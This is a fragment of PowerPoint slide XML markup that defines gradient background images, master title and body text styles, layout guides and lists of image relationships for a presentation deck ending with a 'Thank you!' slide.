          <p:cNvPr id="26" name="!!Gradient TEAL" descr="A green light in the dark&#10;&#10;Description automatically generated with medium confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CBC56335-88D7-9A16-F428-3F33CC5E2E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3723998" y="-7141249"/>
            <a:ext cx="30375286" cy="18691998"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="27" name="!!Gradient PURPLE" descr="A purple line in the dark&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E322719-7B92-4670-0B5D-073D53C3BB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-3326217" y="-21147412"/>
            <a:ext cx="30852901" cy="18460181"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="28" name="!!Gradient TEAL 2" descr="A green light in the dark&#10;&#10;Description automatically generated with medium confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03102D45-B6E8-A996-92F6-013C84D7A7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41162" y="-14367024"/>
            <a:ext cx="43317174" cy="26656030"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="29" name="!!Gradient CRIMSON" descr="A red light in the dark&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2BB938D2-62B0-C0D2-7B11-B95FA60DE00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203831" y="5900243"/>
            <a:ext cx="13737594" cy="8773513"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="30" name="!!Gradient GREEN" descr="A green line in the dark&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E686C428-BAF0-00A1-13AF-A3863BAA8F0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12405867" y="6640679"/>
            <a:ext cx="10895238" cy="7504762"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="31" name="!!Gradient TEAL Fat" descr="A blue oval with black background&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{119EAB66-E7BC-EBA5-9C52-62565CA2F26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60000"/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1690830" y="6175432"/>
            <a:ext cx="14486283" cy="10287000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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0FC53B04-EE13-51AA-CF9E-D5DAA8E329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46575" y="4501770"/>
            <a:ext cx="9594850" cy="18209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120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k-SK"/>
              <a:t>Thank you!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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0459DD87-F49C-CA22-FEF6-F141C05159E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7367677" y="8359281"/>
            <a:ext cx="3946971" cy="782588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664A9833-1C98-97D1-FF38-7971434C433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505501" y="1162174"/>
            <a:ext cx="5276998" cy="58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5061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pos="612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805790C-A82B-2902-A9F2-FAB744389A16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xmlns="" val="hdr"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="17708563" y="63500"/>
            <a:ext cx="544512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EAA221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1241352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68" r:id="rId2"/>
    <p:sldLayoutId id="2147483765" r:id="rId3"/>
    <p:sldLayoutId id="2147483767" r:id="rId4"/>
    <p:sldLayoutId id="2147483776" r:id="rId5"/>
    <p:sldLayoutId id="2147483775" r:id="rId6"/>
    <p:sldLayoutId id="2147483752" r:id="rId7"/>
    <p:sldLayoutId id="2147483761" r:id="rId8"/>
    <p:sldLayoutId id="2147483762" r:id="rId9"/>
    <p:sldLayoutId id="2147483770" r:id="rId10"/>
    <p:sldLayoutId id="2147483777" r:id="rId11"/>
    <p:sldLayoutId id="2147483778" r:id="rId12"/>
    <p:sldLayoutId id="2147483779" r:id="rId13"/>
    <p:sldLayoutId id="2147483780" r:id="rId1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2814337" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="80000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPts val="1385"/>
        </a:spcAft>
        <a:buNone/>
        <a:defRPr sz="2793" b="0" i="0" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Microsoft GothicNeo" panose="020B0500000101010101" pitchFamily="34" charset="-127"/>
          <a:ea typeface="Microsoft GothicNeo" panose="020B0500000101010101" pitchFamily="34" charset="-127"/>
          <a:cs typeface="Microsoft GothicNeo" panose="020B0500000101010101" pitchFamily="34" charset="-127"/>
        </a:defRPr>
      </a:lvl1pPr>
    </p:titleStyle>
    <p:bodyStyle>
      <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="2814337" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPts val="838"/>
        </a:spcAft>
        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
        <a:buNone/>
        <a:defRPr sz="3771" b="0" i="0" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="Microsoft GothicNeo" panose="020B0500000101010101" pitchFamily="34" charset="-127"/>
          <a:cs typeface="Microsoft GothicNeo" panose="020B0500000101010101" pitchFamily="34" charset="-127"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr marL="754164" indent="0" algn="l" defTabSz="2814337" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPts val="838"/>
        </a:spcAft>
        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
        <a:buNone/>
        <a:defRPr sz="3771" b="0" i="0" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="Microsoft GothicNeo" panose="020B0500000101010101" pitchFamily="34" charset="-127"/>
          <a:cs typeface="Microsoft GothicNeo" panose="020B0500000101010101" pitchFamily="34" charset="-127"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr marL="1508328" indent="0" algn="l" defTabSz="2814337" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPts val="838"/>
        </a:spcAft>
        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
        <a:buNone/>
        <a:defRPr sz="3771" b="0" i="0" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="Microsoft GothicNeo" panose="020B0500000101010101" pitchFamily="34" charset="-127"/>
          <a:cs typeface="Microsoft GothicNeo" panose="020B0500000101010101" pitchFamily="34" charset="-127"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr marL="2262492" indent="0" algn="l" defTabSz="2814337" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPts val="838"/>
        </a:spcAft>
        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
        <a:buNone/>
        <a:defRPr sz="3771" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr marL="3016656" indent="0" algn="l" defTabSz="2814337" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPts val="838"/>
        </a:spcAft>
        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
        <a:buNone/>
        <a:defRPr sz="3771" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl5pPr>
      <a:lvl6pPr marL="7739422" indent="-703583" algn="l" defTabSz="2814337" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
        <a:buChar char="•"/>
        <a:defRPr sz="6157" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl6pPr>
      <a:lvl7pPr marL="9146590" indent="-703583" algn="l" defTabSz="2814337" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
        <a:buChar char="•"/>
        <a:defRPr sz="6157" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl7pPr>
      <a:lvl8pPr marL="10553758" indent="-703583" algn="l" defTabSz="2814337" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
        <a:buChar char="•"/>
        <a:defRPr sz="6157" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl8pPr>
      <a:lvl9pPr marL="11960925" indent="-703583" algn="l" defTabSz="2814337" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
        <a:buChar char="•"/>
        <a:defRPr sz="615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2814337" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:defRPr sz="5540" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr marL="1407167" algn="l" defTabSz="2814337" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:defRPr sz="5540" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr marL="2814337" algn="l" defTabSz="2814337" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:defRPr sz="5540" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr marL="4221502" algn="l" defTabSz="2814337" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:defRPr sz="5540" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr marL="5628669" algn="l" defTabSz="2814337" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:defRPr sz="5540" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl5pPr>
      <a:lvl6pPr marL="7035839" algn="l" defTabSz="2814337" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:defRPr sz="5540" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl6pPr>
      <a:lvl7pPr marL="8443006" algn="l" defTabSz="2814337" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:defRPr sz="5540" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl7pPr>
      <a:lvl8pPr marL="9850172" algn="l" defTabSz="2814337" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:defRPr sz="5540" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl8pPr>
      <a:lvl9pPr marL="11257341" algn="l" defTabSz="2814337" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:defRPr sz="55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115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480" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="5" pos="576" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="6" pos="10944" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="7" orient="horz" pos="576" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="8" orient="horz" pos="590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13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image45.png"/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12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image47.sv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1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44.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image46.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image45.svg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image43.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4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sv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4.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image51.svg"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image49.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image45.sv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9.svg"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image84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43.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image45.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image47.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image48.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image87.svg"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4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4.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image51.svg"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image49.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image45.sv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9.svg"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image84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43.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image45.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image47.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image48.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image87.svg"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4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43.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image49.svg"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image48.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image49.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image47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7.svg"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image51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87.svg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image44.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image50.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image46.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image89.svg"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image45.svg"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8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91.svg"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image49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8.png"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image84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87.svg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image93.svg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image50.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image89.svg"/><Relationship Id="rId1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93.svg"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image49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20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image84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91.svg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image52.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image89.svg"/><Relationship Id="rId1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93.svg"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image49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20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image84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91.svg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image52.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image89.svg"/><Relationship Id="rId1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93.svg"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image49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20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image84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91.svg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image52.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image89.svg"/><Relationship Id="rId1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93.svg"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image49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20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image84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91.svg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image52.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image89.svg"/><Relationship Id="rId1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93.svg"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image49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20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image84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91.svg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image52.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image89.svg"/><Relationship Id="rId1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93.svg"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image45.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image51.svg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image49.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image53.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image47.sv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44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91.svg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image45.svg"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image84.svg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image52.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image49.svg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image89.svg"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image43.png"/><Relationship Id="rId22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43.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image49.svg"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide20.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image84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45.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image48.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image47.svg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image44.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image51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0.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image49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07.svg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4.png"/><Relationship Id="rId15" 